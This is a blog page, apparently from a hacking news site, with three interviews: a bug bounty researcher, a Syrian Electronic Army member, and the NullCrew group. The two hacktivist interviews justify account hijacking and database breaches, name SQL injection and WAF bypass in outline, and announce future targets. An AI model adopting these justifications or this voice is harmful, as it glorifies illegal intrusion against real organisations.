Search This Blog

Powered by Blogger.

Blog Archive

Labels

Showing posts with label Interview with hacker. Show all posts

Exclusive Interview with Security Researcher Prakhar Prasad

Today, E Hacking News had a chance to interview one of the Indian Security researcher, Prakhar Prasad, who recently received $5000 reward from Paypal for a file uploading vulnerability.

1. Introduce yourself
I'm Prakhar Prasad, 19 years old from Ranchi, Jharkhand.I love playing and breaking Web Applications' Security. I've found critical vulnerabilities in majority of popular websites like Google, Facebook, Twitter, PayPal, Adobe, Apple, Symantec, Nokia-Siemens Networks and etc.

Athough I'm also working on Exploit Writing, Anti-Virus evasion techniques and Malware Analysis.

2. How did you get into Information security field?

I got into Information Security when I was in class 10th, because of an incident. One fine morning I was reading my local newspaper and on the main page of newspaper it was a screenshot of my state government's website showing - "Hacked by Ashiyane Digital Security Team". This incident facinated me completely like - How someone can change the website's homepage with his own message. I started Googling around and then learnt how websites and stuff worked from security point of view.

Then the love for information security took me to a whole new level. Sleepless nights, with a burning desire to learn as much as possible.


3. When did you start Bug hunting?

I started bug hunting back in July 2012.


4. What is your first finding , how did you feel at that time?

My first finding was a clickjacking bug in Google Website Translator Toolkit, that allowed me to add arbitrary "Admin/Editor" on someone's account by redressing page.

5.What is the favorite vulnerability found by you?

Umm.. My favorite one is the Blind SQL Injection bug I found on PayPal's Notifications website. But I also like a permission bug I found in a PayPal acquisition that allowed me to unsubscribe any user of my choice from their mailing list.

6. How much have you earned so far from Bug hunting?

I'd keep it private :) But it's more than enough !

7. You're hunting bugs for fun, for profit, or to make the world a safer place?

I hunt bugs, basically for fun and keeping world a safer place. But now various bug bounty programs have started that allows me to earn alongside with the points I mentioned.

8.What is your future plans?

Can't say anything right now, I'm still learning things. But I want to do something really big for my country, India

9. How did you feel when you received $5000 from Paypal?

It was a huge surprise. When my bug got validated I was expecting some big amount. But when I was paid the exact, it was enormous.

10. What is your advice for new bug hunters?
Just use Google to learn everything from scratch, it is the most powerful tool to gain knowledge of ANY KIND.  Don't opt for some Tom, Dick and Harry Ethical Hacking courses, they teach half-baked concepts and suck your money. Google is the best thing to get things started, don't be like a spoon-feeding child. I'd recommend a book called the Web Application Hacker's Handbook, to start off.

One must watch Nir Goldshlager's HITBAMS2012 talk on Killing a Bug Bounty Program Twice. It's the best video out there regarding bug hunting.

Remember always, hunt bugs for fun, to learn more not just for money. If you are honest with your work, you'll get fame, money and all success. But if you just use automated tools, then you're gonna have a hard time finding bugs and success in InfoSec world.

Automated tools just can't find bugs in big websites, plus it kills the fun of finding bugs manually. Semi-automated/Manual tools are cool to work with like Burp Suite and Zed Attack Proxy.


11. What do you think about E Hacking News?

It's a very good news source, keeps me updated about happenings of InfoSec world. I appreciate the work done by the team.

BreakTheSecurity is also doing a great job, in providing tutorials and similar stuff.

Keep the Good Work Up !


12. Thank you, Is there anything else you want to add?

I'm very thankful to EHackingNews for providing me the platform to share my views and experiences !

If anyone wants to connect with me, then I'm on Twitter - @prakharprasad

My best wishes to all learners and EHackingNews.



An Interview with Syrian Electronic Army hacktivists


Today, E Hacking News interviewed the famous Syrian hacktivists "Syrian Electronic Army". The Syrian Electronic Army recently hacked Twitter accounts of Fracne24, Qatar Foundation and AFP. 

*. Please introduce yourself to EHN readers
i'm a Syrian hacker called "The Pro", The leader of special operations department in the Syrian Electronic Army

Tell me something about your Team
The Syrian Electronic Army is a group of Syrian youth who are trying to defend their country against the media campaign against Syria
our mission is spread the truth about what is really happening in Syria

*. What are SEA's objectives?
we attack the media channels who are involved in what is happening in Syria
we spread the truth and publish our message to the world
the enemies of Syria are using the media as a tool to destroy Syria

*. Why did you choose to become a hacktivist? What are your thoughts on hacktivism?
you know that more than 200 channels are covering the Syria crisis
the Syrian media are doing great but
the "bloody" media more stronger than it
so we choose the hacking way
to use their accounts,websites,emails
as a weapon in our hand
every channel have its followers
so we try to gave this followers the truth
instead of lying all the time


*. what kind of method you use for attacking websites?
we use many methods to attack the websites
attacking the host server ... and targeting the domain owner for exmaple
and for the social media accounts
we attack the mail server
like Skynews arabia and AFP


*. How many websites you hacked so far?
we hacked too many websites, but there are a very secure and powerful websites and there are normal websites
http://zone-h.org/archive/special=1/notifier=SEA
http://www.zone-h.org/archive/notifier=The%20Pro

*. What is your next target? How do you choose your targets?
all the enemies of Syria are targets for us
governments,media channels, websites ....


*. Are you afraid of getting caught?
we are not doing something bad to get caught
we are defending our country
but we have 2 martyrs until now
 killed by the "Free" army that pretends to represent to the world they are "peaceful" opposition


*. Is there anything else you would like to add?
no thanks

E Hacking News Interview with The hacker group NullCrew


Today, EHN had an interview with the hacktivist group NullCrew who recently leaked the data from UN Wasatch and Wisconsin University site.  

In the past , the group breached the World Health Organization(Who) , PBS, UNESCO Etxea , Ford, DHS's Study in the States and Sharp Electronics UK, University of North Carolina , Yale University, South Africa's Leading ISP Directory site and more sites.


Why did you attack those sites?

These servers are a part of the system, a system which is ran by corrupt rich assholes. They mostly use their money for themself,

No donations to the people who need the money, and if they do; it's just so people look at them in a kinder way, only for publicity.

Wasatch is a partner of Microsoft, ran by Bill Gates; it was to target them as part of the system, their under the table dealings. The way they treat employees, take full credit for certian things.

The United Nations attack, mainly because the UN is all Nations together. And all nations are corrupt, wheather the people see it or not; that is something we wish to stop. Those are the reasons.

wisc.edu Became a target when they commited Animal Cruelty.

What kind of method you used?

The methods we're all SQL injection of different techniques. WasatchIT and Software were on a shared host, two of the websites hosted. On the server contained SQL injection, and in the databases displayed WasatchIT and WasatchSoftware.


We exploited [wisc.edu] via b-sqli. UN.org had a MSSQLi behind A WAF, which we had to bypass to gain access to the databases, and data its self.

What is your Next target?
Our next big release will be on Febuary 14th, yes, yes; VALENTINES DAY! It'll be the official release of #FuckTheSystem valentines day, and one target I will tell you is the pentagon.

But our next single release will be a multipul target release, on United States government servers; retaliating against #OperationFastAndFurious. How many more need to die, from weapons the government is putting into criminal's hands?

What is your ultimate goal? What do you hope to achieve by hacking these websites ?
Our ultimate goal, is to make the people of the system stand and revolt; and to prove that #FuckTheSystem is not a joke.  For people to finally live without fear, to be able to bring others into the world without fear.
 
Have you seen any results after your campaigns?
After our Unescoetxa defacment, with the song everything is corrupt; there were comments upon comments from people posting #FuckTheSystem from whatever country they lived in. So yes, we have seen results.

How many websites did you hack so far?
To be honest, atleast 150+ We've outlived most groups, and been highly active.